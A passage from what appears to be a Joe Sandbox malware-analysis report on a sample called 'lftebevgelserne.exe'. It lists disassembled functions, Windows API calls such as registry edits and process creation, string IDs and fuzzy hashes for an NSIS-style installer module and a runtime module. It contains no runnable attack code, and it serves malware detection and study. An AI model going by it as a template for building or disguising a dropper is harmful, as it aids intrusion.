                                                      • CharNextW.USER32(?,00000000,75573420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
                                                      • CharPrevW.USER32(?,?,75573420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: *?|<>/":
                                                      • API String ID: 589700163-165019052
                                                      • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                      • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                      • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                      • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,1F234AEA,?,?,1F234A8A,?,1F242238,0000000C,1F234BBD,00000000,00000000), ref: 1F234B59
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1F234B6C
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,1F234AEA,?,?,1F234A8A,?,1F242238,0000000C,1F234BBD,00000000,00000000,?,1F232082), ref: 1F234B8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: ff61e264c31f23ff80e166d6151d330c046da59ab379c6440ad34c663216e585
                                                      • Instruction ID: 7453af445907737954760b5780edee29d709e19fd980cdda26c5d2a6ec3f02ac
                                                      • Opcode Fuzzy Hash: ff61e264c31f23ff80e166d6151d330c046da59ab379c6440ad34c663216e585
                                                      • Instruction Fuzzy Hash: 48F08CF5D0021CABCB019FA0C868BDEBFBAEF0C722F5001A4F805A6151EB329951CA91
                                                      APIs
                                                      • lstrcatW.KERNEL32(00000000,00000000,004095A8,00435000,?,?,00000031), ref: 004017A8
                                                      • CompareFileTime.KERNEL32(-00000014,?,004095A8,004095A8,00000000,00000000,004095A8,00435000,?,?,00000031), ref: 004017CD
                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160,00403160,004216C8,00000000,?,00000000), ref: 004051D4
                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                      • String ID:
                                                      • API String ID: 1941528284-0
                                                      • Opcode ID: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
                                                      • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                                      • Opcode Fuzzy Hash: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
                                                      • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 1F23715C
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1F23717F
                                                        • Part of subcall function 1F2356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F235702
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1F2371A5
                                                      • _free.LIBCMT ref: 1F2371B8
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1F2371C7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 68d7ef992d648a3455a897e93344541daf6fc7f45f6b6c3a59c3acf96a583e37
                                                      • Instruction ID: 0fc39fd918f844341f23c7e73278561c2010cd43ae9cc7e7513e06bad227de86
                                                      • Opcode Fuzzy Hash: 68d7ef992d648a3455a897e93344541daf6fc7f45f6b6c3a59c3acf96a583e37
                                                      • Instruction Fuzzy Hash: 66018DF7E156267B571145B64C8CD7B696DDACEF623110119FD44C7204FA619C0291B1
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                      • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                      • Opcode Fuzzy Hash: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                      • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000000,1F23636D,1F235713,00000000,?,1F232249,?,?,1F231D66,00000000,?,?,00000000), ref: 1F235B7F
                                                      • _free.LIBCMT ref: 1F235BB4
                                                      • _free.LIBCMT ref: 1F235BDB
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F235BE8
                                                      • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F235BF1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: f010cedcbffd5b6a81781bf320e7c446074519174f0eb925a40cae97af21fae4
                                                      • Instruction ID: 7937283d81000ddcb817c640748fe545f7976a5424a18e2a1577e60918061b9a
                                                      • Opcode Fuzzy Hash: f010cedcbffd5b6a81781bf320e7c446074519174f0eb925a40cae97af21fae4
                                                      • Instruction Fuzzy Hash: 5501F4FAD14B13A7C20296341CEAD0F2A2F9BCDA737700224F81D97549EE75EC024166
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,?,?,1F2310DF,?,?,?,00000000), ref: 1F231E9A
                                                      • lstrcatW.KERNEL32(?,?,?,1F2310DF,?,?,?,00000000), ref: 1F231EAC
                                                      • lstrlenW.KERNEL32(?,?,1F2310DF,?,?,?,00000000), ref: 1F231EB3
                                                      • lstrlenW.KERNEL32(?,?,1F2310DF,?,?,?,00000000), ref: 1F231EC8
                                                      • lstrcatW.KERNEL32(?,1F2310DF,?,1F2310DF,?,?,?,00000000), ref: 1F231ED3
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 493641738-0
                                                      • Opcode ID: 9d15c440c5ff7ebcb0a07154e2cbd9de5abfe01f6c9576ec8e822d73519b67cd
                                                      • Instruction ID: 04adbf113e0c104fde63eb87898193f531e20eb3a0930a3118ed44518a76b407
                                                      • Opcode Fuzzy Hash: 9d15c440c5ff7ebcb0a07154e2cbd9de5abfe01f6c9576ec8e822d73519b67cd
                                                      • Instruction Fuzzy Hash: E5F0E9A65002247AD2212729ACC9EBF777CEFCAB31B500019F50883580EB55685282B5
                                                      APIs
                                                      • _free.LIBCMT ref: 1F2391D0
                                                        • Part of subcall function 1F23571E: HeapFree.KERNEL32(00000000,00000000,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?), ref: 1F235734
                                                        • Part of subcall function 1F23571E: GetLastError.KERNEL32(?,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?,?), ref: 1F235746
                                                      • _free.LIBCMT ref: 1F2391E2
                                                      • _free.LIBCMT ref: 1F2391F4
                                                      • _free.LIBCMT ref: 1F239206
                                                      • _free.LIBCMT ref: 1F239218
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 15d95e83fa7b896c76c0bc398652dca359d83c5f01d0005a0ef8ab42f643cbc4
                                                      • Instruction ID: 1f3da20612512c72a2a99225565a84937dd8783a6e5143749693dcfde4bb0b85
                                                      • Opcode Fuzzy Hash: 15d95e83fa7b896c76c0bc398652dca359d83c5f01d0005a0ef8ab42f643cbc4
                                                      • Instruction Fuzzy Hash: EAF0CDF1E243529BC610DB58E6CAC4A7BEAEA497223300805F88AD7D04DB70FC808A65
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                      • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                      • Opcode Fuzzy Hash: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                                      • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D59
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                      • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID:
                                                      • API String ID: 3808545654-0
                                                      • Opcode ID: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
                                                      • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                      • Opcode Fuzzy Hash: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
                                                      • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                      APIs
                                                      • _free.LIBCMT ref: 1F23536F
                                                        • Part of subcall function 1F23571E: HeapFree.KERNEL32(00000000,00000000,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?), ref: 1F235734
                                                        • Part of subcall function 1F23571E: GetLastError.KERNEL32(?,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?,?), ref: 1F235746
                                                      • _free.LIBCMT ref: 1F235381
                                                      • _free.LIBCMT ref: 1F235394
                                                      • _free.LIBCMT ref: 1F2353A5
                                                      • _free.LIBCMT ref: 1F2353B6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 9032dbb2f73e67f29664489122e4131b86c096a7729b0167363fad0c5b5ee31a
                                                      • Instruction ID: 4d8625b0ae01910db7b846dd6cc7419dc861d4f3c150771a9e11d288b0d4e778
                                                      • Opcode Fuzzy Hash: 9032dbb2f73e67f29664489122e4131b86c096a7729b0167363fad0c5b5ee31a
                                                      • Instruction Fuzzy Hash: 41F054F4C24A32DBC6059F2895CA4083FB1F74C6313120106FC1897A94E7F72D2AAF81
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe,00000104), ref: 1F234C1D
                                                      • _free.LIBCMT ref: 1F234CE8
                                                      • _free.LIBCMT ref: 1F234CF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                      • API String ID: 2506810119-246385176
                                                      • Opcode ID: a9723c5a3efd597f7f3683155b6c3f3db99f3ed36220f30cddf854d7b6214206
                                                      • Instruction ID: 83de9f36b502c92f5a6abeb370e5db187fbf4d0cd1cb7b166b1b5245ff55f465
                                                      • Opcode Fuzzy Hash: a9723c5a3efd597f7f3683155b6c3f3db99f3ed36220f30cddf854d7b6214206
                                                      • Instruction Fuzzy Hash: 563191F9E01319AFDB11CFA98884D9EBBFCEB8D711B214097E80497640E771AE45CB50
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                      • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                      • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                      • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,1F236FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 1F238731
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 1F2387BA
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1F2387CC
                                                      • __freea.LIBCMT ref: 1F2387D5
                                                        • Part of subcall function 1F2356D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F235702
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: cb70776d0e67ab7923c37b42e9c4da1b29f62e5568b371641cceac05ab4bc88a
                                                      • Instruction ID: 5faae17a756790b229d6c48f96893118e7550bf011b2d4b595b024764404fb0a
                                                      • Opcode Fuzzy Hash: cb70776d0e67ab7923c37b42e9c4da1b29f62e5568b371641cceac05ab4bc88a
                                                      • Instruction Fuzzy Hash: 7231CEF6E0021AABDF15CF64CC84DEF7BA6EB48711F110229EC04DA590E775E954CB91
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                      • lstrlenW.KERNEL32(0040A5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID:
                                                      • API String ID: 1356686001-0
                                                      • Opcode ID: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
                                                      • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                      • Opcode Fuzzy Hash: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
                                                      • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
                                                      APIs
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160,00403160,004216C8,00000000,?,00000000), ref: 004051D4
                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                        • Part of subcall function 004056FA: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                        • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      • Opcode ID: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                                      • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                      • Opcode Fuzzy Hash: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                                      • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,1F231D66,00000000,00000000,?,1F235C88,1F231D66,00000000,00000000,00000000,?,1F235E85,00000006,FlsSetValue), ref: 1F235D13
